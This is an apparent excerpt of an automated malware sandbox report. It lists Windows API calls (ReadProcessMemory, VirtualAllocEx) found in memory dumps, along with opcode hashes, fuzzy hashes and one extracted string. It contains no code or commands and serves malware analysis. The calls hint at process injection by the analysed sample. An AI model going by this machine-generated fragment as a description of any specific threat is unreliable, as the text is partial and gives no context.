                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 525722b37905b1e6383321e5c94f670133b7d0511da7d594d6a88f1b14b699dc
                                                        • Instruction ID: 6726d6c018c9c7cc7b4fa03ff67985a186649f6dca6dce04412aead393a8f20b
                                                        • Opcode Fuzzy Hash: 525722b37905b1e6383321e5c94f670133b7d0511da7d594d6a88f1b14b699dc
                                                        • Instruction Fuzzy Hash: 772127759002599FCB10CFA9D884BEEFBB5FF48314F10882EE959A7240D7789941CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00504640
                                                        Memory Dump Source
                                                        • Source File: 00000026.00000002.2199349764.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 7d4700536eda9c28d7985895a42855d0c1afb2d1d76f052cfc3af9bd7f8abe30
                                                        • Instruction ID: 126469519192acfb6054bbbadf9553f49d74faa51167a0463d9953b372781ed9
                                                        • Opcode Fuzzy Hash: 7d4700536eda9c28d7985895a42855d0c1afb2d1d76f052cfc3af9bd7f8abe30
                                                        • Instruction Fuzzy Hash: A0213C75D002099FCB10CF99C8447EEFBF5FF48314F50882AE919A7240D7759540CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0050407E
                                                        Memory Dump Source
                                                        • Source File: 00000026.00000002.2199349764.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: de96173d4574a7423e747ef33a125d3956ce205620a2f3104c387ef76f72e3ae
                                                        • Instruction ID: a4e25d410332fe5fcec02e8e316f57c38c21e24711376128bd69dc624a032594
                                                        • Opcode Fuzzy Hash: de96173d4574a7423e747ef33a125d3956ce205620a2f3104c387ef76f72e3ae
                                                        • Instruction Fuzzy Hash: 961137759002099FCB10CFA9D844BEEBBF9FF48314F14881AD619A7250D775A940CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.2165220574.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID: KDBM
                                                        • API String ID: 0-3504354710
                                                        • Opcode ID: e5817ee5de0828b01298b8f8241944baca5e8a4e908cf77fdea99e14a4045b55
                                                        • Instruction ID: 905ce4b5bcea247e7d7e5cf906d9991c066415fbdb8b5fb0f59f946640db8d91
                                                        • Opcode Fuzzy Hash: e5817ee5de0828b01298b8f8241944baca5e8a4e908cf77fdea99e14a4045b55
                                                        • Instruction Fuzzy Hash: CB818E78A10249CFC745EFF8EA58A9D3FB6EB94308F008E24D00997A69EB7416C5CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions